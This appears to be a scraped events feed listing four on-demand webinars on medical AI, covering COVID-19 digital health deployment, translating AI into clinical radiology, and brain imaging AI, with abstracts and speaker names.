SUMMARY:On-Demand: COVID-19: Breaking down the barriers to deployment of AI
DESCRIPTION:Abstract\nThe coronavirus pandemic has drastically accelerated the deployment of digital health solutions. Indeed\, governments and health ministries across the world have been inundated with offers from tech firms wanting to do their bit in the fight against COVID-19.\n\nHowever\, there is a risk that untested\, unvalidated\, untried technologies might be brought forward in response to this urgent global crisis. Instead\, industry experts recommend focusing on trusted technology and pushing that faster.\n\nBut how can health leaders evaluate the options they are being presented with? Where do we strike the balance between agility\, evidence\, regulation and validation? What does the future look like for deployment of AI solutions in healthcare?\n\nIn this exclusive webinar\, the UK Department of International Trade will discuss their digital health offer for COVID-19\, presenting real use cases and the British companies solving them\, and offering tangible examples of how digital health can support us during this crisis.\n\n \n\nClick here to View On-Demand\n\n \nSpeakers\nMadhukar BoseIndia and Digital Health Lead\, Healthcare UKRichard A. SUMMARY:On-Demand: Breaking Through the Bottlenecks: Successful Translation of AI into Clinical Radiology.
DESCRIPTION:Abstract: \nIn spite of the promise it holds and the anticipation it has generated\, artificial intelligence (AI) in medicine is not immune to bottlenecks translating the technology from research to clinical practice. Medical professionals are often not actively engaged in developing these AI-based applications and tools. On the other hand\, industrial experts submerged in the effort lack relevant knowledge and deep understanding of the challenges faced by clinical staff. As such\, there remains a significant gap between cutting-edge innovation and what goes on in real life. \nFurthermore\, the large datasets required to efficiently train AI algorithms are hard to come by. They are even more difficult to curate properly without the direct input of medical professionals who realize the importance of these technologies. Coupled with the lack of infrastructure to continuously validate and scale up the developed algorithms\, translating AI into clinical practice remains near yet so far. \nClick here to view on demand\n  \nSpeakers: \n\nDr. Anthony ChangFounder AIMed\, Chief Artificial Intelligence OfficerChildren’s Hospital of Orange County (CHOC) R. SUMMARY:On-Demand: Transforming patient care through imaging AI
DESCRIPTION:Abstract: \nTalk of artificial intelligence (AI) and machine learning (ML) has abounded in radiology circles for some years now. Their potential to revolutionize radiology practice\, and in particular image analysis\, is significant. And for some\, the future of radiology has already arrived\, reducing variability and enabling greater efficiency and accuracy. \nBut how is this working in clinical practice? What are the barriers to implementation of AI solutions and\, most importantly\, what are the outcomes for patients? How can technology providers best support clinicians? \nIn this exclusive webinar\, leading radiologists will discuss the clinical applications of a cutting edge brain imaging AI in the evaluation of patients with dementia\, multiple sclerosis and traumatic brain injury\, including examples of clinical cases with multimodal brain imaging (MRI\, icobrain\, FDG brain PET-CT and Amyloid PET). \nClick here to view on demand \n  \nSpeakers: \nDr. Suzie BashMedical Director of Neuroradiology San Fernando ValleyFrançois NicolasChief Digital Officer\, Guerbet Orest B Boyko\, MD\, PhDAssociate Professor of RadiologyUniversity of Southern California \n  \nSupported by: \n \n

SUMMARY:On-Demand: Continuing the discussion for successful translation of AI into clinical radiology
DESCRIPTION:Abstract \nIn the earlier AIMed webinar\, speakers touched upon challenges hindering the real adoption of artificial intelligence (AI) in clinical radiology. As most radiologists share a rather speedy and hectic workload\, AI tools that require extra plug-ins or taking up additional study time may not be well-received. Likewise\, it may not be of the domain’s interest\, if a new solution cannot be seamlessly integrated into the existing Picture Archiving and Communication (PAC) system\, regardless of how effective or efficient it may be. \nIn general\, speakers suggested bridging the gap between ideas and reality. Clinicians who are passionate about data science and AI should gather and bring both radiology and technology closer. On the other hand\, tech guru should consult fellow clinicians to address the real and immediate needs. In spite of the informational session\, there were issues such as obtaining the right data to train AI algorithms\, educating patients and the next generation of clinicians on the benefits of AI\, and whether the existing regulations could support and further accelerate new technologies\, remain unexplored. \nAs such\, in this upcoming webinar\, speakers will continue their discussion of what contributes to a successful translation of AI into present clinical radiology. \nClick here to view on demand \nSpeakers: \nEmily WatkinsSolution Architect\, Pure StorageSamir Shah\, MD\, MMMVP Clinical OperationsRadiology PartnersTessa CookAssistant Professor of Radiology University of PennsylvaniaDr. Ross FiliceChief of Imaging InformaticsMedStar Medical Group Radiology \nSupported by:
